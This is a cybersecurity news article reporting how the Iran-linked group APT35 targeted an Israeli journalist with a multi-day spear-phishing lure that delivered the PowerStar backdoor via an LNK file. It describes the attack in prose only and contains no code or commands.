“APT35 Updates Cyberattack Arsenal, Targets Israeli Journalist in Spear-Phishing Campaign”
Introduction
The Iran-linked advanced persistent threat group known as APT35, also referred to as Charming Kitten, Imperial Kitten, or Tortoiseshell, has recently enhanced its cyberattack capabilities. APT35 is alleged to be operating out of Iran and is primarily focused on collecting intelligence by compromising account credentials and targeting email accounts through spear-phishing campaigns. According to a blog post by cybersecurity firm Volexity, APT35 recently attempted a highly targeted attack on an Israeli journalist using a spear-phishing lure. This attack highlights the group’s use of sophisticated social engineering techniques and improved backdoor malware.
The Spear-Phishing Campaign
In this particular campaign, APT35 employed a “draft report” lure, targeting an Israeli journalist. The attackers initially contacted the victim, asking if they would be open to reviewing a document related to US foreign policy. The journalist, considering this a usual request in their line of work, agreed. However, instead of immediately sending the malicious document, the attackers continued the interaction with benign emails containing a list of questions. After multiple days of seemingly legitimate interaction, APT35 finally sent the “draft report” disguised as a password-protected RAR file. This file contained a malicious LNK file that downloaded a newly upgraded backdoor called PowerStar.
The PowerStar Malware
PowerStar is an updated version of one of APT35‘s known backdoors, CharmPower. The spear-phishing email contained an .LNK file within a password-protected .RAR file. When executed, the .LNK file downloaded PowerStar from the Backblaze hosting provider and attacker-controlled infrastructure. PowerStar collects system information from the compromised machine and sends it to a command-and-control (C2) address. Volexity believes this variant of PowerStar to be particularly complex and suspects the existence of a custom server-side component supporting it. This component automates simple actions for the malware operator and allows the attacker to prevent future analysis of the malware’s key functionality through a kill switch.
The Quest for Return on Investment
According to Toby Lewis, the global head of threat analysis at Darktrace, APT35‘s targeting profile aligns with expectations of an Iranian government-affiliated group. He emphasizes the group’s focus on being bespoke, stealthy, and under the radar, which leads them to invest heavily in social engineering techniques to maximize success rates. Lewis notes that APT groups vary in sophistication, with some developing zero-day exploits, while others demonstrate sophistication in how they manage and control their infrastructure. APT35 falls into the latter category, utilizing custom payloads and different modules from third-party services. This adaptive approach makes it harder to detect and track their attacks.
Rare Use of Malware
Volexity researchers have noticed that APT35 rarely deploys malware in their operations. They believe this sparing use of malware increases the difficulty of tracking their attacks. The group has been active for over a decade and has launched extensive campaigns against organizations and officials across North America and the Middle East. Public attribution has identified APT35 as an Iran-based nation-state threat actor. Recent campaigns indicate potential physical targeting, such as kidnapping and other kinetic operations, related to Iran’s activities against dissenters.
Conclusion
APT35, an Iran-linked advanced persistent threat group, has recently updated its cyberattack arsenal and used spear-phishing tactics to target an Israeli journalist. The group’s sophisticated social engineering techniques and use of improved backdoor malware highlight their efforts to remain stealthy and under the radar. APT35‘s approach includes delivering custom payloads, employing different modules from third-party services, and limiting the use of easily detectable malware. These tactics make it challenging to attribute attacks to the group and track their activities effectively. As state-sponsored threat actors continue to evolve, organizations and individuals must maintain constant vigilance, ensure robust cybersecurity measures, and exercise caution in their online interactions to mitigate the risk of falling victim to cyberattacks.
<< photo by cottonbro studio >>
The image is for illustrative purposes only and does not depict the actual situation.
You might want to read !
- Perception Point’s New AI Model: A Game-Changer in Combating BEC Attacks
- The Future of Data Security: Thales Collaborates with Google Cloud GenAI
- IP Fabric Raises $25M in Series B Funding to Drive Network Assurance Adoption
- TSMC Faces Cyber Threats: A Closer Look into the Hacking Incident
- Iran’s MuddyWater Cyber Threat Takes a Sinister Turn
- UAE and Israel Join Forces to Combat Cyber Threats: A Game-Changing Intelligence Partnership
- North Korea’s Cyber Espionage Takes a Sinister Turn: Malware Equipped with Microphone Wiretapping Features
- Unveiling the Tactics of the Russian APT Group Behind the Roundcube Email Server Hacks
- Unraveling the Strategic Blueprint: Analyzing Russia’s Hybrid War in Ukraine
